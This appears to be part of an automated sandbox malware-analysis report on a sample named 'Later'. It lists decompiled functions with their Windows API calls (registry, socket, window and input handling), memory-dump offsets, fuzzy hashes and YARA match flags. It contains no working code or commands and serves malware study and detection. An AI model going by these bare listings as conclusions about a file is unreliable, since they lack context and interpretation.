                                        • Opcode Fuzzy Hash: 7e5b113a054ec048522f1b609beca7e37e704bf85443bf7f3acf540a8d4b0968
                                        • Instruction Fuzzy Hash: C4B1497990024ADBDF10CFA8C5807EEB7B1FF08310F148169EE59AB654EB34AA54CB64
                                        APIs
                                        • ___std_exception_destroy.LIBVCRUNTIME ref: 0142965A
                                        • ___std_exception_destroy.LIBVCRUNTIME ref: 01429673
                                        • ___std_exception_destroy.LIBVCRUNTIME ref: 014298D5
                                        • ___std_exception_destroy.LIBVCRUNTIME ref: 014298EE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ___std_exception_destroy
                                        • String ID: value
                                        • API String ID: 4194217158-494360628
                                        • Opcode ID: 9008c3e85f2859f3142ae87dd7a70045b809f36809fcb9b31878c18b0c59cd59
                                        • Instruction ID: bc178b97521bc06a6e5938776f8304ff3367cd21a89079601feb573c32839033
                                        • Opcode Fuzzy Hash: 9008c3e85f2859f3142ae87dd7a70045b809f36809fcb9b31878c18b0c59cd59
                                        • Instruction Fuzzy Hash: EC12CC709002699BEB25CB28CC84BEDBBB5AF65304F1482DED448A73A1DB705AC8CF51
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: _memmove$__itow__swprintf
                                        • String ID:
                                        • API String ID: 3253778849-0
                                        • Opcode ID: f9ebc7ad9552b9973124508a2c6bc1839b856f3ee9bb6e9ef79a1cee5db50f54
                                        • Instruction ID: 275abb9f3dbd3ad0c0a7c5d01390d3d234a39bd1a04010c7dbb919c5b190c5e9
                                        • Opcode Fuzzy Hash: f9ebc7ad9552b9973124508a2c6bc1839b856f3ee9bb6e9ef79a1cee5db50f54
                                        • Instruction Fuzzy Hash: 7161013450024E9BCF11EF60CC82EFE37A4AF05308F448559FD596B292DB30AD9AEB54
                                        APIs
                                          • Part of subcall function 00C01A36: _memmove.LIBCMT ref: 00C01A77
                                          • Part of subcall function 00C71242: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C701D5,?,?), ref: 00C71259
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C706E5
                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C70725
                                        • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00C70748
                                        • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00C70771
                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C707B4
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00C707C1
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                        • String ID:
                                        • API String ID: 4046560759-0
                                        • Opcode ID: b9a67357c1d099442220db7a17f1d692c64024fa5f1418c231ee868acadb0369
                                        • Instruction ID: ad0a973959ae63f37910a1e39068dbcbec6579af17ff3700f9cbd62bb4ef7f0a
                                        • Opcode Fuzzy Hash: b9a67357c1d099442220db7a17f1d692c64024fa5f1418c231ee868acadb0369
                                        • Instruction Fuzzy Hash: 28518D31208204EFD714EB64C885E6FB7E8FF85314F14891DF999872A1DB31E905DB92
                                        APIs
                                        • _memset.LIBCMT ref: 00C5286B
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C528B6
                                        • IsMenu.USER32(00000000), ref: 00C528D6
                                        • CreatePopupMenu.USER32 ref: 00C5290A
                                        • GetMenuItemCount.USER32(000000FF), ref: 00C52968
                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C52999
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                        • String ID:
                                        • API String ID: 3311875123-0
                                        • Opcode ID: 912c6b1ca7eebeb23b0231c86896bff1d0839a1f9c16de871d7f9000c8e98322
                                        • Instruction ID: c0682b2d7fc9687729aea6fb2156eba33e2526567077e09b45a690b089ddf662
                                        • Opcode Fuzzy Hash: 912c6b1ca7eebeb23b0231c86896bff1d0839a1f9c16de871d7f9000c8e98322
                                        • Instruction Fuzzy Hash: 2151B07860420AEBDF24CF68C888BADBBF4FF46315F144559EC6197391D3709A88CB69
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 014C37B7
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 014C37C1
                                        • codecvt.LIBCPMT ref: 014C37FB
                                          • Part of subcall function 014C3F5E: __EH_prolog3.LIBCMT ref: 014C3F65
                                        • std::_Facet_Register.LIBCPMT ref: 014C3812
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 014C3832
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 014C383F
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: std::_$H_prolog3Lockit$Concurrency::cancel_current_taskFacet_Lockit::_Lockit::~_Registercodecvt
                                        • String ID:
                                        • API String ID: 3530451596-0
                                        • Opcode ID: bacdd97eed8f360b9e9aafe02e468167296723ad8c4f1afaa5c5d52713e7fd01
                                        • Instruction ID: 8c74ff6ba5d4c3799e722583ca34f2b0302da850ae3ecc8d91e35c736d4e6cf8
                                        • Opcode Fuzzy Hash: bacdd97eed8f360b9e9aafe02e468167296723ad8c4f1afaa5c5d52713e7fd01
                                        • Instruction Fuzzy Hash: B831EB75900217AFCF45EFA9D8848AFBBB9FF74624B10451EE9149B2A0DB71D901C790
                                        APIs
                                        • #23.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C6678C
                                        • #111.WSOCK32(00000000), ref: 00C6679B
                                        • #2.WSOCK32(00000000,?,00000010), ref: 00C667B7
                                        • #13.WSOCK32(00000000,00000005), ref: 00C667C6
                                        • #111.WSOCK32(00000000), ref: 00C667E0
                                        • #3.WSOCK32(00000000,00000000), ref: 00C667F4
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: #111
                                        • String ID:
                                        • API String ID: 568940515-0
                                        • Opcode ID: 2b7e2162d951a8960b0451b28f29eeda9ced832a53174058d98af98ea32a3538
                                        • Instruction ID: 1516ff6c23f10138e0aafe8cb95f931363dcb40df733237061a38128e69e1ab6
                                        • Opcode Fuzzy Hash: 2b7e2162d951a8960b0451b28f29eeda9ced832a53174058d98af98ea32a3538
                                        • Instruction Fuzzy Hash: 1B21D6356006049FCB20EF64C985B7EB7E9EF44324F244558FA66A73D1CB70AD45CB91
                                        APIs
                                        • GetLastError.KERNEL32(?,?,014DC3F1,014DA46C,014D978F), ref: 014DC408
                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 014DC416
                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 014DC42F
                                        • SetLastError.KERNEL32(00000000,014DC3F1,014DA46C,014D978F), ref: 014DC481
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorLastValue___vcrt_
                                        • String ID:
                                        • API String ID: 3852720340-0
                                        • Opcode ID: 786120b45dc24d834bca913d7db644e9e57fbe0cfe8a559eeff3ef9c36923c31
                                        • Instruction ID: b8f2ead4eb359e78c66048859b7fe9e536e19bcd0ac67102587663597036dac0
                                        • Opcode Fuzzy Hash: 786120b45dc24d834bca913d7db644e9e57fbe0cfe8a559eeff3ef9c36923c31
                                        • Instruction Fuzzy Hash: 7401D83358A2266DAF352AFA7CE4B772784EB12675361033FE528591F4EE314805E784
                                        APIs
                                        • GetDC.USER32(00000000), ref: 00C4C131
                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00C4C142
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C4C149
                                        • ReleaseDC.USER32(00000000,00000000), ref: 00C4C151
                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C4C168
                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 00C4C17A
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: CapsDevice$Release
                                        • String ID:
                                        • API String ID: 1035833867-0
                                        • Opcode ID: e556cf1dc285f598bc5c01b191ad51070348403e4fbaa3605f44b4d79a6c7256
                                        • Instruction ID: 903a31ae730048312bbbee634993503deaba6248a91f58336050ba835f75b2a3
                                        • Opcode Fuzzy Hash: e556cf1dc285f598bc5c01b191ad51070348403e4fbaa3605f44b4d79a6c7256
                                        • Instruction Fuzzy Hash: 24018475E40218BBEB509BA59C49B5EBFB8EF48351F104065FE04A7291D6309D10CFA0
                                        APIs
                                          • Part of subcall function 00BF16CF: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00BF1729
                                          • Part of subcall function 00BF16CF: SelectObject.GDI32(?,00000000), ref: 00BF1738
                                          • Part of subcall function 00BF16CF: BeginPath.GDI32(?), ref: 00BF174F
                                          • Part of subcall function 00BF16CF: SelectObject.GDI32(?,00000000), ref: 00BF1778
                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00C7C2F7
                                        • LineTo.GDI32(00000000,00000003,?), ref: 00C7C30B
                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00C7C319
                                        • LineTo.GDI32(00000000,00000000,?), ref: 00C7C329
                                        • EndPath.GDI32(00000000), ref: 00C7C339
                                        • StrokePath.GDI32(00000000), ref: 00C7C349
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                        • String ID:
                                        • API String ID: 43455801-0
                                        • Opcode ID: 090db59096410b73df75def5b57a54991f5cd25fc063507d4feb338fa8c38a34
                                        • Instruction ID: 312cf2ec8b81e42a28298401386b0e1fa75fa72c765f6f51cfddd38519e7872f
                                        • Opcode Fuzzy Hash: 090db59096410b73df75def5b57a54991f5cd25fc063507d4feb338fa8c38a34
                                        • Instruction Fuzzy Hash: 2811F77200010DBFDB129F94DC88FAE7FADEB08364F148055BA185A1A0C7729E59EBA0
                                        APIs
                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C10717
                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00C1071F
                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C1072A
                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C10735
                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00C1073D
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00C10745
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Virtual
                                        • String ID:
                                        • API String ID: 4278518827-0
                                        • Opcode ID: 7c8fef8737a74a5f1c15b0b1e13be2f3eed0fd66e8a7a3d0e29ff71f14f99593
                                        • Instruction ID: 5f0bec7ec6513a1ff7f9664e147816c0bad4a3c9444986f3c3b19bc73722a9df
                                        • Opcode Fuzzy Hash: 7c8fef8737a74a5f1c15b0b1e13be2f3eed0fd66e8a7a3d0e29ff71f14f99593
                                        • Instruction Fuzzy Hash: EA016CB09017597DE3008F5A8C85B56FFB8FF59354F00411BA15C47941C7F5A868CBE5
                                        APIs
                                        • #8.OLEAUT32(?,00C80980), ref: 00C68AC5
                                        • CharUpperBuffW.USER32(?,?), ref: 00C68BD4
                                        • #9.WSOCK32(?,00000001,00000000,Incorrect Parameter format,00000000), ref: 00C68D4C
                                          • Part of subcall function 00C5798A: #8.OLEAUT32(00000000,?,?,?,?,?,00C69B86,?,?), ref: 00C579CA
                                          • Part of subcall function 00C5798A: #10.WSOCK32(00000000,?,?,00C69B86,?,?), ref: 00C579D3
                                          • Part of subcall function 00C5798A: #9.WSOCK32(00000000,?,00C69B86,?,?), ref: 00C579DF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper
                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                        • API String ID: 3964851224-1221869570
                                        • Opcode ID: 083509167967fd7c4b1d67b820bf36f0999a90958442946405acf12bb0e446e2
                                        • Instruction ID: 29f328a2ee208a2d2710ffabb3efb93a8d04217b176df8f3dccc6ac5e27cfeb4
                                        • Opcode Fuzzy Hash: 083509167967fd7c4b1d67b820bf36f0999a90958442946405acf12bb0e446e2
                                        • Instruction Fuzzy Hash: 59918D756043019FC710DF24C48196BBBF4EF89714F148A6DF99A8B3A2DB31E94ACB52
                                        APIs
                                          • Part of subcall function 00BF2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BF214F
                                          • Part of subcall function 00BF2111: GetStockObject.GDI32(00000011), ref: 00BF2163
                                          • Part of subcall function 00BF2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF216D
                                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C7684E
                                        • LoadLibraryW.KERNEL32(?), ref: 00C76855
                                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C7686A
                                        • DestroyWindow.USER32(?), ref: 00C76872
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                        • String ID: SysAnimate32
                                        • API String ID: 4146253029-1011021900
                                        • Opcode ID: 082206afbcd5c72fdcf21ec8f2a8ad546294f3ced3d04e6cdbfd7a431f7cc40d
                                        • Instruction ID: c36b744597f0c23aee94f83842fbbff69fd971dcdd037e556f9d747c74a55e5b
                                        • Opcode Fuzzy Hash: 082206afbcd5c72fdcf21ec8f2a8ad546294f3ced3d04e6cdbfd7a431f7cc40d
                                        • Instruction Fuzzy Hash: D6217971600A06ABEF104EB4DC80FBB77ADEB59368F208628FA68921D0D731CC519761
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 014CE554
                                        • __Getcvt.LIBCPMT ref: 014CE562
                                          • Part of subcall function 014C7E36: _Maklocstr.LIBCPMT ref: 014C7E56
                                          • Part of subcall function 014C7E36: _Maklocstr.LIBCPMT ref: 014C7E73
                                          • Part of subcall function 014C7E36: _Maklocstr.LIBCPMT ref: 014C7E90
                                          • Part of subcall function 014C7E36: _Maklocchr.LIBCPMT ref: 014C7EA2
                                          • Part of subcall function 014C7E36: _Maklocchr.LIBCPMT ref: 014C7EB5
                                        • _Mpunct.LIBCPMT ref: 014CE5E1
                                        • _Mpunct.LIBCPMT ref: 014CE5FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Maklocstr$MaklocchrMpunct$GetcvtH_prolog3
                                        • String ID: $+xv
                                        • API String ID: 1880433610-1686923651
                                        • Opcode ID: 941f8bf67ee6f225775fa9a54334f094f4349b810fa73d0fde77ccdec23d8b3e
                                        • Instruction ID: fb2a1265745ab0ec308f1e0ead0b6afd7bef6a1dbd7e9af26618f2c813e1a389
                                        • Opcode Fuzzy Hash: 941f8bf67ee6f225775fa9a54334f094f4349b810fa73d0fde77ccdec23d8b3e
                                        • Instruction Fuzzy Hash: 9F21B2B5904B42AFD761DF76849063BBEF8AB2C601F04091FE599C7A51E734E601CB90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: api-ms-
                                        • API String ID: 0-2084034818
                                        • Opcode ID: b0f88fa46ef5168f1303c5bfe9a4445e6974e6c49eeed381acb5ad7739ed7a8a
                                        • Instruction ID: 01a1c673a026b39347864dae57e4eac2f1d833701919712757ce11236bae8aca
                                        • Opcode Fuzzy Hash: b0f88fa46ef5168f1303c5bfe9a4445e6974e6c49eeed381acb5ad7739ed7a8a
                                        • Instruction Fuzzy Hash: E311B631E01225BBDF338EE89CB4A5B3B64AB05BA8F550112E916AB3E1D670ED05C6D0
                                        APIs
                                          • Part of subcall function 00C01821: _memmove.LIBCMT ref: 00C0185B
                                          • Part of subcall function 00C4A835: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C4A852
                                          • Part of subcall function 00C4A835: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C4A865
                                          • Part of subcall function 00C4A835: GetCurrentThreadId.KERNEL32 ref: 00C4A86C
                                          • Part of subcall function 00C4A835: AttachThreadInput.USER32(00000000), ref: 00C4A873
                                        • GetFocus.USER32 ref: 00C4AA0D
                                          • Part of subcall function 00C4A87E: GetParent.USER32(?), ref: 00C4A88C
                                        • GetClassNameW.USER32(?,?,00000100), ref: 00C4AA56
                                        • EnumChildWindows.USER32(?,00C4AACE), ref: 00C4AA7E
                                        • __swprintf.LIBCMT ref: 00C4AA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                        • String ID: %s%d
                                        • API String ID: 1941087503-1110647743
                                        • Opcode ID: 337cdba2c09f5bbf691de3a1f27a9d741b0aa8c9372bd1d5472e60fd18e52cdf
                                        • Instruction ID: 8f1ed138d73c8067485143a4e9a3e68661e207481ebab971f2083bc4e8428732
                                        • Opcode Fuzzy Hash: 337cdba2c09f5bbf691de3a1f27a9d741b0aa8c9372bd1d5472e60fd18e52cdf
                                        • Instruction Fuzzy Hash: A5119D71640205ABDB51BFA08D8AFAA776CFF48700F148079FE18AA182DA705945EB71
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_1400000_Later.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Getcvt$H_prolog3_
                                        • String ID: false$true
                                        • API String ID: 4085572910-2658103896
                                        • Opcode ID: 43fb829dafb65b3d67a05d9f631bf2077945d05efdf5558e8cc0c97f457b85a9
                                        • Instruction ID: 5598927deef12c3c98cbb2b77870f8cf802579d89b1bcd784183f5e496729ebe
                                        • Opcode Fuzzy Hash: 43fb829dafb65b3d67a05d9f631bf2077945d05efdf5558e8cc0c97f457b85a9
                                        • Instruction Fuzzy Hash: BB11D0B9940745AFC761EFB9D440B8ABBF4AF29600F04851FE1A58B661DB70E504CF50
                                        APIs
                                        • CharUpperBuffW.USER32(?,?), ref: 00C52184
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000013.00000002.4559459215.0000000000BF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000013.00000002.4559398953.0000000000BF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000C80000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559641705.0000000000CA5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559770060.0000000000CB3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000013.00000002.4559893155.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_19_2_bf0000_Later.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper
                                        • String ID: APPEND$EXISTS$KEYS$REMOVE
                                        • API String ID: 3964851224-769500911
                                        • Opcode ID: 8796a05ce19ab2695a79c537124fc8572bb389d51a5ce3fb9d4b61dfa6e4e84c
                                        • Instruction ID: dbfa8b9a11628e199d160bc0c2ff54d75071123778370eef15bb804a05a7bb6e
                                        • Opcode Fuzzy Hash: 8796a05ce19ab2695a79c537124fc8572bb389d51a5ce3fb9d4b61dfa6e4e84c
                                        • Instruction Fuzzy Hash: 28117C749001098F8F04EF64C8628FEB7B5FF67304B604168EC2697252DB725E8AEF80
                                        APIs
